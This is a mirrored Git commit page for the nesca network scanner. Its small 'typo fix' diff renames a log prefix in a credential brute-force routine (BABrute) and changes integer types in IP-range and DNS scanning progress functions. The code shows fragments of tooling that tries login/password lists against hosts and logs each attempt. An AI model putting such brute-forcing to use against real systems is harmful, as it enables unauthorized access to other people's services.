mirror of
https://github.com/ChronosX88/nesca.git
synced 2024-11-23 18:52:19 +00:00
Typo fix.
This commit is contained in:
parent
517484797c
commit
19e458126d
@ -54,7 +54,7 @@ lopaStr BA::BABrute(const char *ip, const int port) {
|
||||
return lps;
|
||||
};
|
||||
|
||||
if (BALogSwitched) stt->doEmitionBAData("FTP: " + QString(ip) + ":" + QString::number(port) +
|
||||
if (BALogSwitched) stt->doEmitionBAData("BA: " + QString(ip) + ":" + QString::number(port) +
|
||||
"; l/p: " + QString(loginLst[i]) + ":" + QString(passLst[j]) + "; - Progress: (" +
|
||||
QString::number((++passCounter / (double)(MaxPass*MaxLogin)) * 100).mid(0, 4) + "%)");
|
||||
|
||||
|
@ -781,7 +781,7 @@ void _connect() {
|
||||
}
|
||||
}
|
||||
|
||||
inline void progressOutput(long long unsigned int target) {
|
||||
inline void progressOutput(unsigned long target) {
|
||||
char targetNPers[128] = {0};
|
||||
float percent = (gTargetsOverall != 0 ? (100 - target/(double)gTargetsOverall * 100) : 0);
|
||||
|
||||
@ -792,13 +792,13 @@ inline void progressOutput(long long unsigned int target) {
|
||||
sprintf(metaPercent, "%.1f",
|
||||
percent);
|
||||
}
|
||||
void verboseProgress(long long unsigned int target, const char *ip) {
|
||||
void verboseProgress(unsigned long target, const char *ip) {
|
||||
|
||||
stt->doEmitionIPRANGE(QString(ip));
|
||||
strcpy(currentIP, ip);
|
||||
progressOutput(target);
|
||||
}
|
||||
void verboseProgressDNS(long long unsigned int target, const char *ip, const char *TLD, const char *mask) {
|
||||
void verboseProgressDNS(unsigned long target, const char *ip, const char *TLD, const char *mask) {
|
||||
|
||||
stt->doEmitionIPRANGE(QString(ip) + QString(TLD));
|
||||
strcpy(currentIP, mask);
|
||||
|
Loading…
Reference in New Issue
Block a user